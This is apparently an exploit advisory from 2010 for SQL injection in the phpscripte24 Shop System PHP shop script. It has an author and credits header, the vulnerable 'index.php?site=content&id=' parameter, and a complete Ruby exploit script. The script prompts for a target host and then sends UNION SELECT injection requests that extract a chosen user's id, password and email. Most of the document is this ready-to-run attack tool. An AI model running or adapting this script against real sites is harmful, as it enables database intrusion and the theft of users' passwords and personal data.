----------------------------Information------------------------------------------------ +Name : phpscripte24 Shop System SQL Injection Vulnerability Exploit +Autor : Easy Laster +ICQ : 11-051-551 +Date : 09.05.2010 +Script : phpscripte24 Shop System +Download : ----------- +Demo : http://www.hiweb-wiesbaden.de/licenseshop/ +Price : 69.99 € +Language :PHP +Discovered by Easy Laster 4004-security-project.com +Security Group Undergroundagents and 4004-Security-Project 4004-security-project.com +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok, Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge, N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101,s0red,c1ox. --------------------------------------------------------------------------------------- ___ ___ ___ ___ _ _ _____ _ _ | | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_ |_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _| |_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_| |___| |___| ---------------------------------------------------------------------------------------- +Vulnerability : www.site.com/shop/index.php?site=content&id= ---------------------------------------------------------------------------------------- #!/usr/bin/ruby #4004-security-project.com #Discovered and vulnerability by Easy Laster require 'net/http' print " ######################################################### # 4004-Security-Project.com # ######################################################### # phpscripte24 Shop System SQL Injection Vulnerability # # Exploit # # Using Host+Path+userid+prefix # # demo.com /shop/ 1 user # # Easy Laster # ######################################################### " block = "#########################################################" print ""+ block +"" print "\nEnter host name (site.com)->" host=gets.chomp print ""+ block +"" print "\nEnter script path (/forum/)->" path=gets.chomp print ""+ block +"" print "\nEnter userid (userid)->" userid=gets.chomp print ""+ block +"" print "\nEnter prefix (prefix z.b user)->" prefix=gets.chomp print ""+ block +"" begin dir = "index.php?site=content&id=99999999999/**/UNION/**/SELECT/**/1,2,concat(0x23,0x23,0x23,0x23,0x23,id,0x23,0x23,0x23,0x23,0x23)/**/FROM/**/"+ prefix +"/**/WHERE/**/id="+ userid +"" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nThe ID is -> "+(/#####(.+)#####/).match(resp.body)[1] dir = "index.php?site=content&id=99999999999/**/UNION/**/SELECT/**/1,2,concat(0x23,0x23,0x23,0x23,0x23,passwort,0x23,0x23,0x23,0x23,0x23)/**/FROM/**/"+ prefix +"/**/WHERE/**/id="+ userid +"" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nThe Password is -> "+(/#####(.+)#####/).match(resp.body)[1] dir = "index.php?site=content&id=99999999999/**/UNION/**/SELECT/**/1,2,concat(0x23,0x23,0x23,0x23,0x23,email,0x23,0x23,0x23,0x23,0x23)/**/FROM/**/"+ prefix +"/**/WHERE/**/id="+ userid +"" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nThe Email is -> "+(/#####(.+)#####/).match(resp.body)[1] rescue print "\nExploit failed" end